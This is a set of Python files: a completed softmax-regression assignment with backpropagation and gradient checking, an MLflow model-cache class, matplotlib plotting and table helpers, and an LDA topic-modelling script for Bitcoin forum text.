        W: the weight matrix of softmax regression, a float numpy matrix of shape (c by p). Here c is the number of classes.
        b: the bias values of softmax regression, a float numpy vector of shape c by 1.
    Output:
        z: the linear logits, a float numpy vector of shape c by 1.
    '''
    #########################################
    ## INSERT YOUR CODE HERE
    z = W.dot(x) + b
    #########################################
    return z
#-----------------------------------------------------------------
def compute_a(z):
    '''
    Compute the softmax activations.
    Input:
        z: the logit values of softmax regression, a float numpy vector of shape c by 1. Here c is the number of classes
    Output:
        a: the softmax activations, a float numpy vector of shape c by 1.
    '''
    #########################################
    ## INSERT YOUR CODE HERE
    # Shift by the maximum logit for numerical stability, then clamp very
    # negative values at -100 so exp() cannot underflow to an all-zero column.
    shifted = np.maximum(z - np.max(z), -100)
    exp_z = np.exp(shifted)
    a = exp_z / exp_z.sum(axis=0)
    #########################################
    return a
#-----------------------------------------------------------------
def compute_L(a,y):
    '''
    Compute multi-class cross entropy, which is the loss function of softmax regression.
    Input:
        a: the activations of a training instance, a float numpy vector of shape c by 1. Here c is the number of classes.
        y: the label of a training instance, an integer scalar value. The values can be 0,1,2, ..., or (c-1).
    Output:
        L: the loss value of softmax regression, a float scalar.
    '''
    #########################################
    ## INSERT YOUR CODE HERE
    # BUG FIX: removed a leftover debug print(a) and a pointless
    # `for i in range(c)` loop that recomputed the identical value c times.
    # Guard against log(0): cap the loss at a large finite constant.
    if a[y] == 0:
        L = 1e7
    else:
        L = np.sum(-np.log(a[y]))
    L = float(L)
    #########################################
    return L
#-----------------------------------------------------------------
def forward(x,y,W,b):
    '''
    Forward pass: given an instance in the training data, compute the logits z, activations a and multi-class cross entropy L on the instance.
    Input:
        x: the feature vector of a training instance, a float numpy vector of shape p by 1. Here p is the number of features/dimensions.
        y: the label of a training instance, an integer scalar value. The values can be 0,1,2, ..., or (c-1).
        W: the weight matrix of softmax regression, a float numpy matrix of shape (c by p). Here c is the number of classes.
        b: the bias values of softmax regression, a float numpy vector of shape c by 1.
    Output:
        z: the logit values of softmax regression, a float numpy vector of shape c by 1.
        a: the activations of a training instance, a float numpy vector of shape c by 1.
        L: the loss value of softmax regression, a float scalar.
    '''
    #########################################
    ## INSERT YOUR CODE HERE
    # Chain the three forward-pass stages: logits -> softmax -> loss.
    logits = compute_z(x, W, b)
    activations = compute_a(logits)
    loss = compute_L(activations, y)
    #########################################
    return logits, activations, loss
#-----------------------------------------------------------------
# Compute Local Gradients
#-----------------------------------------------------------------
#-----------------------------------------------------------------
def compute_dL_da(a, y):
    '''
    Compute local gradient of the multi-class cross-entropy loss function w.r.t. the activations.
    Input:
        a: the activations of a training instance, a float numpy vector of shape c by 1. Here c is the number of classes.
        y: the label of a training instance, an integer scalar value. The values can be 0,1,2, ..., or (c-1).
    Output:
        dL_da: the local gradients of the loss function w.r.t. the activations, a float numpy vector of shape c by 1.
               The i-th element dL_da[i] represents the partial gradient of the loss function w.r.t. the i-th activation a[i]: d_L / d_a[i].
    '''
    #########################################
    ## INSERT YOUR CODE HERE
    # Only the true-class entry is non-zero: d(-log a[y]) / d a[y] = -1/a[y].
    dL_da = np.zeros_like(a, dtype=float)
    if a[y] == 0:
        # Match the capped loss in compute_L: use a large finite gradient.
        dL_da[y] = -1e7
    else:
        dL_da[y] = -1.0 / a[y]
    #########################################
    return dL_da
#-----------------------------------------------------------------
def compute_da_dz(a):
    '''
    Compute local gradient of the softmax activations a w.r.t. the logits z.
    Input:
        a: the activation values of softmax function, a numpy float vector of shape c by 1. Here c is the number of classes.
    Output:
        da_dz: the local gradient of the activations a w.r.t. the logits z, a float numpy matrix of shape (c by c).
               The (i,j)-th element of da_dz represents the partial gradient ( d_a[i] / d_z[j] )
    '''
    #########################################
    ## INSERT YOUR CODE HERE
    # BUG FIX: the element-wise loop assigned size-(1,) arrays (e.g.
    # a[i]*(1-a[i])) into scalar slots, which is deprecated and an error on
    # NumPy >= 1.25. Vectorized form of the softmax Jacobian:
    #   da_dz = diag(a) - a a^T
    # (diagonal a[i](1-a[i]), off-diagonal -a[i]a[j]).
    col = np.asarray(a, dtype=float).reshape(-1, 1)
    da_dz = np.asmatrix(np.diagflat(col) - col.dot(col.T))
    #########################################
    return da_dz
#-----------------------------------------------------------------
def compute_dz_dW(x,c):
    '''
    Compute local gradient of the logits function z w.r.t. the weights W.
    Input:
        x: the feature vector of a data instance, a float numpy vector of shape p by 1. Here p is the number of features/dimensions.
        c: the number of classes, an integer.
    Output:
        dz_dW: the partial gradient of logits z w.r.t. the weight matrix, a numpy float matrix of shape (c by p).
               The (i,j)-th element of dz_dW represents the partial gradient of the i-th logit (z[i]) w.r.t. the weight W[i,j]: d_z[i] / d_W[i,j]
    Hint: the partial gradients only depend on the input x and the number of classes.
    '''
    #########################################
    ## INSERT YOUR CODE HERE
    # BUG FIX: the element-wise loop assigned size-(1,) slices (x[j]) into
    # scalar slots, which is deprecated and an error on NumPy >= 1.25.
    # Since z[i] = sum_j W[i,j] x[j] + b[i], every row of dz_dW equals x^T.
    row = np.asarray(x, dtype=float).reshape(1, -1)
    dz_dW = np.asmatrix(np.repeat(row, c, axis=0))
    #########################################
    return dz_dW
#-----------------------------------------------------------------
def compute_dz_db(c):
    '''
    Compute local gradient of the logits function z w.r.t. the biases b.
    Input:
        c: the number of classes, an integer.
    Output:
        dz_db: the partial gradient of the logits z w.r.t. the biases b, a float vector of shape c by 1.
               Each element dz_db[i] represents the partial gradient of the i-th logit z[i] w.r.t. the i-th bias b[i]: d_z[i] / d_b[i]
    '''
    #########################################
    ## INSERT YOUR CODE HERE
    # z[i] = (Wx)[i] + b[i], so d_z[i]/d_b[i] = 1 for every class.
    dz_db = np.asmatrix(np.ones((c, 1)))
    #########################################
    return dz_db
#-----------------------------------------------------------------
# Back Propagation
#-----------------------------------------------------------------
#-----------------------------------------------------------------
def backward(x,y,a):
    '''
    Back Propagation: given an instance in the training data, compute all local gradients on the instance.
    Input:
        x: the feature vector of a training instance, a float numpy vector of shape p by 1. Here p is the number of features/dimensions.
        y: the label of a training instance, an integer scalar value. The values can be 0,1,2, ..., or (c-1).
        a: the activations of a training instance, a float numpy vector of shape c by 1. Here c is the number of classes.
    Output:
        dL_da: the local gradients of the loss function w.r.t. the activations, a float numpy vector of shape c by 1.
        da_dz: the local gradient of the activation w.r.t. the logits z, a float numpy matrix of shape (c by c).
        dz_dW: the partial gradient of logits z w.r.t. the weight matrix W, a numpy float matrix of shape (c by p).
        dz_db: the partial gradient of the logits z w.r.t. the biases b, a float vector of shape c by 1.
    '''
    #########################################
    ## INSERT YOUR CODE HERE
    # Delegate each local gradient to its dedicated helper.
    num_classes = np.shape(a)[0]
    return (
        compute_dL_da(a, y),
        compute_da_dz(a),
        compute_dz_dW(x, num_classes),
        compute_dz_db(num_classes),
    )
    #########################################
#-----------------------------------------------------------------
def compute_dL_dz(dL_da,da_dz):
    '''
    Given the local gradients, compute the gradient of the loss function L w.r.t. the logits z using chain rule.
    Input:
        dL_da: the local gradients of the loss function w.r.t. the activations, a float numpy vector of shape c by 1.
        da_dz: the local gradient of the activation w.r.t. the logits z, a float numpy matrix of shape (c by c).
    Output:
        dL_dz: the gradient of the loss function L w.r.t. the logits z, a numpy float vector of shape c by 1.
               The i-th element dL_dz[i] represents the partial gradient of the loss function L w.r.t. the i-th logit z[i]: d_L / d_z[i].
    '''
    #########################################
    ## INSERT YOUR CODE HERE
    # CLEANUP: removed dead code (`c = ...` and `dL_dz = np.ones(c)` were
    # immediately overwritten and never used).
    # Chain rule: dL_dz = da_dz . dL_da (np.vstack normalizes dL_da to (c,1)).
    dL_dz = np.asmatrix(np.dot(da_dz, np.vstack(dL_da)))
    #########################################
    return dL_dz
#-----------------------------------------------------------------
def compute_dL_dW(dL_dz,dz_dW):
    '''
    Given the local gradients, compute the gradient of the loss function L w.r.t. the weights W using chain rule.
    Input:
        dL_dz: the gradient of the loss function L w.r.t. the logits z, a numpy float vector of shape c by 1.
        dz_dW: the partial gradient of logits z w.r.t. the weight matrix W, a numpy float matrix of shape (c by p).
    Output:
        dL_dW: the global gradient of the loss function w.r.t. the weight matrix, a numpy float matrix of shape (c by p).
               The i,j-th element dL_dW[i,j] represents the partial gradient of the loss function L w.r.t. the weight W[i,j].
    '''
    #########################################
    ## INSERT YOUR CODE HERE
    # Element-wise chain rule: dL_dW[i,j] = dL_dz[i] * dz_dW[i,j]
    # (the (c,1) column dL_dz broadcasts across the columns of dz_dW).
    dL_dW = np.multiply(dL_dz, dz_dW)
    #########################################
    return dL_dW
#-----------------------------------------------------------------
def compute_dL_db(dL_dz,dz_db):
    '''
    Given the local gradients, compute the gradient of the loss function L w.r.t. the biases b using chain rule.
    Input:
        dL_dz: the gradient of the loss function L w.r.t. the logits z, a numpy float vector of shape c by 1.
        dz_db: the local gradient of the logits z w.r.t. the biases b, a float numpy vector of shape c by 1.
    Output:
        dL_db: the global gradient of the loss function L w.r.t. the biases b, a float numpy vector of shape c by 1.
               The i-th element dL_db[i] represents the partial gradient of the loss function w.r.t. the i-th bias: d_L / d_b[i]
    '''
    #########################################
    ## INSERT YOUR CODE HERE
    # Element-wise chain rule: dL_db[i] = dL_dz[i] * dz_db[i].
    dL_db = np.multiply(dL_dz, dz_db)
    #########################################
    return dL_db
#-----------------------------------------------------------------
# gradient descent
#-----------------------------------------------------------------
#--------------------------
def update_W(W, dL_dW, alpha=0.001):
    '''
    Update the weights W using gradient descent.
    Input:
        W: the current weight matrix, a float numpy matrix of shape (c by p). Here c is the number of classes.
        dL_dW: the global gradient of the loss function w.r.t. the weight matrix, a numpy float matrix of shape (c by p).
        alpha: the step-size parameter of gradient descent, a float scalar.
    Output:
        W: the updated weight matrix, a numpy float matrix of shape (c by p).
    '''
    #########################################
    ## INSERT YOUR CODE HERE
    # One gradient-descent step: move against the gradient.
    W = W - alpha * dL_dW
    #########################################
    return W
#--------------------------
def update_b(b, dL_db, alpha=0.001):
    '''
    Update the biases b using gradient descent.
    Input:
        b: the current bias values, a float numpy vector of shape c by 1.
        dL_db: the global gradient of the loss function L w.r.t. the biases b, a float numpy vector of shape c by 1.
        alpha: the step-size parameter of gradient descent, a float scalar.
    Output:
        b: the updated bias vector, a float numpy vector of shape c by 1.
    '''
    #########################################
    ## INSERT YOUR CODE HERE
    # One gradient-descent step: move against the gradient.
    b = b - alpha * dL_db
    #########################################
    return b
#--------------------------
# train
def train(X, Y, alpha=0.01, n_epoch=100):
    '''
    Given a training dataset, train the softmax regression model by iteratively updating the weights W and biases b using the gradients computed over each data instance.
    Input:
        X: the feature matrix of training instances, a float numpy matrix of shape (n by p). Here n is the number of data instances, p is the number of features/dimensions.
        Y: the labels of training instances, an integer numpy array of length n. The values can be 0, 1, ..., or (c-1).
        alpha: the step-size parameter of gradient descent, a float scalar.
        n_epoch: the number of passes to go through the training set, an integer scalar.
    Output:
        W: the weight matrix trained on the training set, a numpy float matrix of shape (c by p).
        b: the bias, a float numpy vector of shape c by 1.
    '''
    # number of features and classes
    n_features = X.shape[1]
    n_classes = max(Y) + 1
    # randomly initialize the parameters
    W = np.asmatrix(np.random.rand(n_classes, n_features))
    b = np.asmatrix(np.random.rand(n_classes, 1))
    for _ in range(n_epoch):
        # go through each training instance
        for x, y in zip(X, Y):
            x = x.T  # convert to column vector
            #########################################
            ## INSERT YOUR CODE HERE
            # Forward pass: logits, softmax activations and loss.
            _, a, _ = forward(x, y, W, b)
            # Back propagation: all local gradients.
            dL_da, da_dz, dz_dW, dz_db = backward(x, y, a)
            # Chain rule for the global gradients.
            dL_dz = compute_dL_dz(dL_da, da_dz)
            # Update the parameters using gradient descent.
            W = update_W(W, compute_dL_dW(dL_dz, dz_dW), alpha)
            b = update_b(b, compute_dL_db(dL_dz, dz_db), alpha)
            #########################################
    return W, b
#--------------------------
def predict(Xtest, W, b):
    '''
    Predict the labels of the instances in a test dataset using softmax regression.
    Input:
        Xtest: the feature matrix of testing instances, a float numpy matrix of shape (n_test by p). Here n_test is the number of data instances in the test set, p is the number of features/dimensions.
        W: the weight matrix of the softmax regression model, a float numpy matrix of shape (c by p).
        b: the bias values of the softmax regression model, a float vector of shape c by 1.
    Output:
        Y: the predicted labels of test data, a numpy array of length ntest. Each element can be 0, 1, ..., or (c-1).
        P: the predicted probabilities of test data to be in different classes, a float numpy matrix of shape (ntest, c).
    '''
    n = Xtest.shape[0]
    c = W.shape[0]
    Y = np.zeros(n)  # initialize as all zeros
    P = np.asmatrix(np.zeros((n, c)))
    for i, x in enumerate(Xtest):
        x = x.T  # convert to column vector
        #########################################
        ## INSERT YOUR CODE HERE
        # IMPROVEMENT: replaced the hand-rolled max-tracking loop with
        # np.argmax (same first-max tie-breaking) and a whole-row store.
        a = compute_a(compute_z(x, W, b))
        P[i] = np.asarray(a).ravel()
        Y[i] = np.argmax(a)
        #########################################
    return Y, P
#-----------------------------------------------------------------
# gradient checking
#-----------------------------------------------------------------
#-----------------------------------------------------------------
def check_da_dz(z, delta=1e-7):
    '''
    Compute local gradient of the softmax function using gradient checking (finite differences).
    Input:
        z: the logit values of softmax regression, a float numpy vector of shape c by 1. Here c is the number of classes.
        delta: a small number for gradient check, a float scalar.
    Output:
        da_dz: the approximated local gradient of the activations w.r.t. the logits, a float numpy matrix of shape (c by c).
               The (i,j)-th element represents the partial gradient ( d a[i] / d z[j] )
    '''
    c = z.shape[0]  # number of classes
    da_dz = np.asmatrix(np.zeros((c, c)))
    # PERF: the unperturbed activations do not depend on (i, j); compute
    # them once instead of c*c times inside the loop.
    a0 = compute_a(z)
    for i in range(c):
        for j in range(c):
            d = np.asmatrix(np.zeros((c, 1)))
            d[j] = delta
            da_dz[i, j] = (compute_a(z + d)[i, 0] - a0[i, 0]) / delta
    return da_dz
#-----------------------------------------------------------------
def check_dL_da(a, y, delta=1e-7):
    '''
    Compute local gradient of the multi-class cross-entropy function w.r.t. the activations using gradient checking (finite differences).
    Input:
        a: the activations of a training instance, a float numpy vector of shape c by 1. Here c is the number of classes.
        y: the label of a training instance, an integer scalar value. The values can be 0,1,2, ..., or (c-1).
        delta: a small number for gradient check, a float scalar.
    Output:
        dL_da: the approximated local gradients of the loss function w.r.t. the activations, a float numpy vector of shape c by 1.
    '''
    c = a.shape[0]  # number of classes
    dL_da = np.asmatrix(np.zeros((c, 1)))  # initialize the vector as all zeros
    # PERF: the baseline loss does not depend on i; compute it once
    # instead of once per loop iteration.
    L0 = compute_L(a, y)
    for i in range(c):
        d = np.asmatrix(np.zeros((c, 1)))
        d[i] = delta
        dL_da[i] = (compute_L(a + d, y) - L0) / delta
    return dL_da
#--------------------------
def check_dz_dW(x, W, b, delta=1e-7):
    '''
    Compute the local gradient of the logit function using gradient check (finite differences).
    Input:
        x: the feature vector of a data instance, a float numpy vector of shape p by 1. Here p is the number of features/dimensions.
        W: the weight matrix of softmax regression, a float numpy matrix of shape (c by p). Here c is the number of classes.
        b: the bias values of softmax regression, a float numpy vector of shape c by 1.
        delta: a small number for gradient check, a float scalar.
    Output:
        dz_dW: the approximated local gradient of the logits w.r.t. the weight matrix computed by gradient checking, a numpy float matrix of shape (c by p).
    '''
    c, p = W.shape  # number of classes and features
    dz_dW = np.asmatrix(np.zeros((c, p)))
    # PERF: the baseline logits do not depend on (i, j); compute them once
    # instead of c*p times inside the loop.
    z0 = compute_z(x, W, b)
    for i in range(c):
        for j in range(p):
            d = np.asmatrix(np.zeros((c, p)))
            d[i, j] = delta
            # BUG FIX: the original misplaced a bracket --
            # `(compute_z(...)[i,0] - compute_z(...))[i,0]` subtracted a whole
            # vector from a scalar before indexing; index both terms directly.
            dz_dW[i, j] = (compute_z(x, W + d, b)[i, 0] - z0[i, 0]) / delta
    return dz_dW
#--------------------------
def check_dz_db(x, W, b, delta=1e-7):
    '''
    Approximate the local gradient of the logits w.r.t. the biases via
    finite differences (gradient checking).
    Input:
        x: feature vector of a data instance, float numpy matrix of shape (p, 1).
        W: weight matrix of softmax regression, float numpy matrix of shape (c, p).
        b: bias values of softmax regression, float numpy matrix of shape (c, 1).
        delta: finite-difference step size, a float scalar.
    Output:
        dz_db: approximated gradient, float matrix of shape (c, 1);
               dz_db[i] approximates d_z[i] / d_b[i].
    '''
    num_classes = W.shape[0]
    dz_db = np.asmatrix(np.zeros((num_classes, 1)))
    for k in range(num_classes):
        # perturb only the k-th bias by delta
        bump = np.asmatrix(np.zeros((num_classes, 1)))
        bump[k] = delta
        dz_db[k] = (compute_z(x, W, b + bump)[k, 0]
                    - compute_z(x, W, b)[k, 0]) / delta
    return dz_db
#-----------------------------------------------------------------
def check_dL_dW(x, y, W, b, delta=1e-7):
    '''
    Approximate the gradient of the loss w.r.t. the weight matrix via
    finite differences (gradient checking).
    Input:
        x: feature vector of a training instance, float numpy matrix of shape (p, 1).
        y: integer class label, one of 0, 1, ..., c-1.
        W: weight matrix of softmax regression, float numpy matrix of shape (c, p).
        b: bias values, float numpy matrix of shape (c, 1).
        delta: finite-difference step size, a float scalar.
    Output:
        dL_dW: approximated gradient of the loss w.r.t. W, shape (c, p).
    '''
    num_classes, num_features = W.shape
    dL_dW = np.asmatrix(np.zeros((num_classes, num_features)))
    for row in range(num_classes):
        for col in range(num_features):
            # perturb a single weight; forward(...)[-1] is the loss value
            bump = np.asmatrix(np.zeros((num_classes, num_features)))
            bump[row, col] = delta
            loss_plus = forward(x, y, W + bump, b)[-1]
            loss_base = forward(x, y, W, b)[-1]
            dL_dW[row, col] = (loss_plus - loss_base) / delta
    return dL_dW
#-----------------------------------------------------------------
def check_dL_db(x, y, W, b, delta=1e-7):
    '''
    Approximate the gradient of the loss w.r.t. the biases via finite
    differences (gradient checking).
    Input:
        x: feature vector of a training instance, float numpy matrix of shape (p, 1).
        y: integer class label, one of 0, 1, ..., c-1.
        W: weight matrix of softmax regression, float numpy matrix of shape (c, p).
        b: bias values, float numpy matrix of shape (c, 1).
        delta: finite-difference step size, a float scalar.
    Output:
        dL_db: approximated gradient of the loss w.r.t. b, shape (c, 1).
    '''
    num_classes = W.shape[0]
    dL_db = np.asmatrix(np.zeros((num_classes, 1)))
    for k in range(num_classes):
        # perturb a single bias; forward(...)[-1] is the loss value
        bump = np.asmatrix(np.zeros((num_classes, 1)))
        bump[k] = delta
        loss_plus = forward(x, y, W, b + bump)[-1]
        loss_base = forward(x, y, W, b)[-1]
        dL_db[k] = (loss_plus - loss_base) / delta
    return dL_db
|
import datetime
import logging
import os
from functools import lru_cache
from pathlib import Path
import mlflow
import requests
from cd4ml.model_utils import load_deployed_model_from_local_file
from cd4ml.problems import list_available_scenarios
class ModelCache:
    """File-backed cache of models tracked by an MLflow server.

    Model artifacts are downloaded on demand into ``cache_location`` and the
    deserialized models are kept in a bounded in-memory LRU cache.
    """

    def __init__(self, cache_location=Path("mlflow_cache")):
        self.logger = logging.getLogger(__name__)
        self.known_problems = list_available_scenarios()
        # Maps MLflow search-result column names to the friendlier keys used
        # in the dictionaries returned by list_available_models_from_ml_flow().
        self.columns_of_interest = {
            'run_id': 'run_id',
            'tags.BuildNumber': 'build_number',
            'tags.mlflow.runName': 'run_number',
            'end_time': 'time',
            'params.MLPipelineParamsName': 'ml_pipeline_params_name',
            'params.FeatureSetName': 'feature_set_name',
            'params.AlgorithmName': 'algorithm_name',
            'params.AlgorithmParamsName': 'algorithm_params_name',
            'tags.DidPassAcceptanceTest': 'passed_acceptance_test'
        }
        self.base_model_directory = cache_location
        mlflow.set_tracking_uri(os.environ["MLFLOW_TRACKING_URL"])

    def _get_id_for_latest_model(self, all_models_for_scenario):
        """Return the run_id of the newest deployable run, or None if none qualify."""
        deployable = [row for row in all_models_for_scenario
                      if self.is_latest_deployable_model(row)]
        if not deployable:
            return None
        # 'time' is formatted with "%c" in list_available_models_from_ml_flow,
        # so parse it back the same way to sort newest-first.
        newest_first = sorted(deployable,
                              key=lambda row: datetime.datetime.strptime(row['time'], "%c"),
                              reverse=True)
        return newest_first[0]['run_id']

    def get_loaded_model_for_scenario_and_run_id(self, scenario, run_id):
        """Return the loaded model for ``scenario``/``run_id``.

        ``run_id`` may be the literal string "latest", in which case the run
        flagged ``is_latest`` by MLflow is resolved first. Returns None when
        the scenario or a latest run cannot be found. Downloads the artifact
        if it is not already cached on disk.
        """
        if run_id == "latest":
            all_models_for_scenario = self.list_available_models_from_ml_flow().get(scenario)
            if all_models_for_scenario is None:
                return None
            latest_item = [item for item in all_models_for_scenario if item['is_latest']]
            if len(latest_item) == 0:
                return None
            return self.get_loaded_model_for_scenario_and_run_id(scenario, latest_item[0]['run_id'])
        model_path = Path(self.base_model_directory, scenario, run_id, "full_model.pkl")
        if not model_path.exists():
            self.download_and_save_from_ml_flow(model_path, run_id)
        return self.read_model(model_path)

    @staticmethod
    @lru_cache(maxsize=64)
    def read_model(model_path):
        """Deserialize the model at ``model_path`` (LRU-cached, max 64 entries).

        BUG FIX: the cache previously decorated the bound method, which makes
        functools.lru_cache key on ``self`` and keep every ModelCache instance
        alive for the cache's lifetime; caching on a staticmethod avoids that
        while keeping ``instance.read_model(path)`` calls working unchanged.
        """
        return load_deployed_model_from_local_file(model_path)

    def list_available_models_from_ml_flow(self):
        """Return {scenario: [run-dict, ...]} for every known scenario.

        Each run-dict carries the renamed columns_of_interest keys plus an
        ``is_latest`` flag marking the newest deployable run.
        """
        returning_dictionary = dict()
        for scenario in self.known_problems:
            experiment = mlflow.get_experiment_by_name(scenario)
            if experiment is None:
                # scenario has no experiment on the tracking server yet
                continue
            runs = mlflow.search_runs(experiment_ids=experiment.experiment_id)
            dataframe_with_columns_of_interest = runs[list(self.columns_of_interest.keys())]
            dataframe_with_columns_renamed = dataframe_with_columns_of_interest.rename(columns=self.columns_of_interest)
            # normalize timestamps to the "%c" string format used for sorting
            dataframe_with_columns_renamed['time'] = dataframe_with_columns_renamed['time'].dt.strftime("%c")
            list_of_dictionaries = dataframe_with_columns_renamed.to_dict("records")
            id_of_latest = self._get_id_for_latest_model(list_of_dictionaries)
            for d in list_of_dictionaries:
                d['is_latest'] = d['run_id'] == id_of_latest
            returning_dictionary[scenario] = list_of_dictionaries
        return returning_dictionary

    @staticmethod
    def download_and_save_from_ml_flow(path, run_id):
        """Fetch the full_model.pkl artifact for ``run_id`` and write it to ``path``."""
        path.parent.mkdir(parents=True, exist_ok=True)
        results = requests.get("{}/get-artifact?path=full_model.pkl&run_uuid={}"
                               .format(mlflow.get_tracking_uri(), run_id))
        with open(path, "wb") as f:
            f.write(results.content)

    @staticmethod
    def is_latest_deployable_model(row):
        """A run is deployable when it used all-default params and passed acceptance."""
        return row['ml_pipeline_params_name'] == 'default' and \
            row['feature_set_name'] == 'default' and \
            row['algorithm_name'] == 'default' and \
            row['algorithm_params_name'] == 'default' and \
            row['passed_acceptance_test'] == 'yes'
|
<gh_stars>1-10
from matplotlib import pyplot as plt
import pandas as pd
import re
import numpy as np
def scplot(fig, dat, dep, coef):
    """
    Draw a scatter plot of dat vs dep with the fitted regression line.
    Inputs:
        fig (matplotlib Figure): figure to draw into
        dat (Pandas Series): data structure containing data about the best policy
        dep (Pandas Series): data structure containing data about outcome of interest
        coef (Pandas DataFrame): output from basic_regression.run_regression()
    Outputs:
        (Axes) the axes containing the plotted model
    """
    ax = fig.add_subplot(111)
    # scatter of the raw observations
    ax.plot(dat, dep, ".", color="b")
    ax.set_xlabel(dat.name)
    ax.set_ylabel(dep.name)
    # overlay the fitted line using the regression coefficients
    slope = coef.loc[dat.name, "values"]
    intercept = coef.loc["Intercept", "values"]
    ax.plot(dat, slope * dat + intercept, '-')
    return ax
def scplot_firstdraft(dat, dep, coef):
    """
    Plots scatter plot with regression line.

    NOTE(review): first-draft version superseded by scplot(). Unlike scplot()
    it indexes coef without the "values" column and omits the intercept term,
    and it writes the figure to a file named 'test' instead of returning it —
    confirm before reusing.
    Inputs:
        dat (Pandas Series): data structure containing data about the best policy
        dep (Pandas Series): data structure containing data about outcome of interest
        coef (Pandas DataFrame): output from basic_regression.run_regression()
    Outputs:
        None (saves the figure to the file 'test')
    """
    # series containing predicted values for outcome
    y_pred = dat.apply(lambda x: x * coef.loc[dat.name])
    # scatterplot with regression line
    plt.plot(dat, y_pred)
    plt.scatter(dat, dep)
    plt.xlabel(dat.name)
    plt.ylabel(dep.name)
    plt.title("{a} vs. {b}".format(a = dat.name, b = dep.name))
    plt.savefig('test')
def dat_df(dat, title=None, color="palegreen"):
    """
    Takes in Pandas DataFrame/Series and returns a matplotlib figure with a table.
    Inputs:
        dat (Pandas DataFrame or Series): Data to represent as a table
        title (str): a string representing the title of the figure. Default is None
        color (str): a string representing a color for the row and column cells.
            Default is pale green
    Outputs:
        a matplotlib Figure containing the rendered table
    """
    fig, ax = plt.subplots()
    ax.set_axis_off()
    dat = dat.round(2)
    dat = abbrev_names(dat)
    if len(dat.shape) > 1:  # dataframe
        table = pd.plotting.table(ax, dat, rowColours=[color] * dat.shape[0],
                                  colColours=[color] * dat.shape[1],
                                  cellLoc='center', loc='upper center')
        n_display_cols = dat.shape[1]
    else:  # series: rendered as a single column of values
        table = pd.plotting.table(ax, dat, rowColours=[color] * dat.shape[0],
                                  colColours=[color], cellLoc='center',
                                  loc='upper center')
        n_display_cols = 1
    # may also customize colors by column/row but might not be aesthetic
    table.auto_set_font_size(False)
    table.set_fontsize(11)
    # BUG FIX: the original accessed dat.columns unconditionally here, which
    # raises AttributeError on the Series branch (a Series has no .columns).
    table.auto_set_column_width(col=list(range(n_display_cols)))
    if title:
        fig.suptitle(title)
    return fig
    # should be noted that row labels default to the indices of the dataframe,
    # which would be states in the policy/outcome dfs. For the df with the
    # linear model coefficients, may want to add a condition/argument
    # to remove them, since the row label would just be an integer index.
def abbrev_names(dat):
    '''
    Abbreviate column and index labels longer than 20 characters.

    Labels are shortened to roughly 1/8 of their length plus "..." and, when
    the label contains a parenthesized phrase, an acronym built from the first
    letter of each word of the last such phrase, e.g.
    "Unemployment Rate (Bureau of Labor Statistics)" -> "Unempl...(B.o.L.S)".

    Inputs:
        dat (Pandas DataFrame or Series): data whose labels should be shortened
    Outputs:
        a copy of dat with abbreviated string labels
    '''
    def _abbrev(label):
        # one-line helper: shorten a single label string
        prefix = label[:round(len(label) / 8)]
        # raw string so the regex escapes are unambiguous
        groups = re.findall(r"\((.+)\)", label)
        if not groups:
            # BUG FIX: labels > 20 chars without parentheses used to raise
            # IndexError on groups[-1]; fall back to a plain truncation.
            return prefix + "..."
        acronym = ".".join(word[0] for word in groups[-1].split())
        return prefix + "...(" + acronym + ")"

    # Only string labels are abbreviated; integer indices (e.g. on the
    # coefficient df) are left untouched instead of crashing on len().
    abbrev_index = {idx: _abbrev(idx) for idx in dat.index
                    if isinstance(idx, str) and len(idx) > 20}
    if hasattr(dat, "columns"):  # DataFrame
        abbrev_columns = {col: _abbrev(col) for col in dat.columns
                          if isinstance(col, str) and len(col) > 20}
        return dat.rename(columns=abbrev_columns, index=abbrev_index)
    return dat.rename(index=abbrev_index)  # Series has no columns
|
<reponame>jasperschroeder/BigDataClass
###############################################################################
# title: 02-lda.py
# created on: May 15, 2021
# summary: lda, outputs topic weights in a df
###############################################################################
import pandas as pd
import numpy as np
import string
import spacy.cli
import matplotlib.pyplot as plt
import pdtext
from pdtext.tf import word_count
import nltk
from nltk.stem.snowball import SnowballStemmer
nltk.download('punkt')
from nltk.tokenize import sent_tokenize
from nltk import word_tokenize
from sklearn.feature_extraction import text
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.decomposition import LatentDirichletAllocation
from joblib import dump, load
# Load the cleaned thread text produced by the preprocessing step.
df = pd.read_csv('nlp-data/clean_text_df.csv', index_col=0)
# after cleaning some text is nan - was originally emojis perhaps
missing = df["text"].isnull()
#df = df.loc[~missing]
# stop words: english + bitcoin related + things we have found after cleaning
my_stop_words = text.ENGLISH_STOP_WORDS.union(["https", "www", "com", "bitcoin", "btc", "bitcoins",
                                               "just", "like", "wallet", "btc", "blockchain",
                                               "crypto", "coinbase", "amp",
                                               "im", "iv", "id", "ive", "ampxb"])
# example for paper
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
text_tokens = word_tokenize('your a grand old flag your a highfli flag and forev in peac may you wave')
tokens_without_sw = [word for word in text_tokens if not word in my_stop_words]
print(tokens_without_sw)
# get the most common words
vectorizer = CountVectorizer(lowercase=True,
                             max_df=0.3,
                             stop_words=my_stop_words,
                             min_df=0.025)
# fit the CountVectorizer to the clean text
# BUG FIX: this called vectorizer.fit(df2['text']) but df2 is never defined
# anywhere in this script (NameError); the cleaned frame is df.
vectorizer.fit(df['text'])
# get the vocabulary of the text
vocab = vectorizer.get_feature_names()
# len(vocab) was 241 at the time of writing
# save this for 02-lda-topics.py
dump(vocab, 'vocab.joblib')
# term frequency matrix used by all LDA fits below
tf = vectorizer.transform(df['text'])
# Compute LDA Models
# Fit one LDA model per candidate topic count and persist each to disk;
# the plots below and 02-lda-topics.py reload these saved models.
for cp in [3, 5, 8, 10, 15, 20]:
    # LDA topic model
    print('Fitting LDA Model for ncomp' + str(cp) + '!!!')
    lda_model = LatentDirichletAllocation(n_components=cp,
                                          max_iter=10,
                                          evaluate_every=1,
                                          random_state=420,
                                          verbose=1)
    # fit (the transformed matrix is discarded here; only the model is kept)
    lda_model.fit_transform(tf)
    # Log Likelihood: Higher the better
    #print("Log Likelihood: ", lda_model.score(tf))
    # Log Likelihood: -26461197.1741212
    # Perplexity: Lower the better. Perplexity = exp(-1. * log-likelihood per word)
    #print("Perplexity: ", lda_model.perplexity(tf))
    # Perplexity: 396.69211197749775
    fname = 'lda-models/2021-13-mai-lda-model-stemmed-ncomp-' + str(cp) + '.joblib'
    dump(lda_model,fname)
###############################
# Plot Perplexity of LDA Models
###############################
# we know that perplexity decreases with the number of topics
# thus we use a rule-of-thumb for unsupervised learning: "elbow rule"
